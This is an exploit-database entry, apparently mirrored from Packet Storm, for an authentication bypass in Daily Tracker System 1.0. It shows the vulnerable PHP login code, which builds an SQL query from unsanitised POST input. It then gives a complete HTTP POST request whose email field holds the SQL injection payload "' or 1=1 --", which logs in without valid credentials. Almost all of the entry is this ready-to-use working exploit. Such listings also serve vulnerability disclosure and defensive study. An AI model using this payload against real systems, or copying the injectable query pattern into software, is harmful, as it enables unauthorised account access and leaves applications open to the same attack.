Share
## https://sploitus.com/exploit?id=PACKETSTORM:158681
# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass  
# Exploit Author: Adeeb Shah (@hyd3sec)  
# Credit to Bobby Cooke  
# Date: July 29th, 2020  
# Vendor Homepage: https://www.sourcecodetester.com  
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL  
# Version: 1.0  
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4  
  
# Vulnerable Source Code  
  
if(isset($_POST['login']))  
{  
$email=$_POST['email'];  
$password=md5($_POST['password']);  
$query=mysqli_query($con,"select ID from tbluser where Email='$email' &&  
Password='$password ' ");  
$ret=mysqli_fetch_array($query);  
if($ret>0){  
$_SESSION['detsuid']=$ret['ID'];  
header('location:dashboard.php');  
}  
else{  
$msg="Invalid Details.";  
}  
}  
?>  
  
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1  
POST /dets/index.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://172.16.65.130/dets/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 48  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s  
Upgrade-Insecure-Requests: 1  
  
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login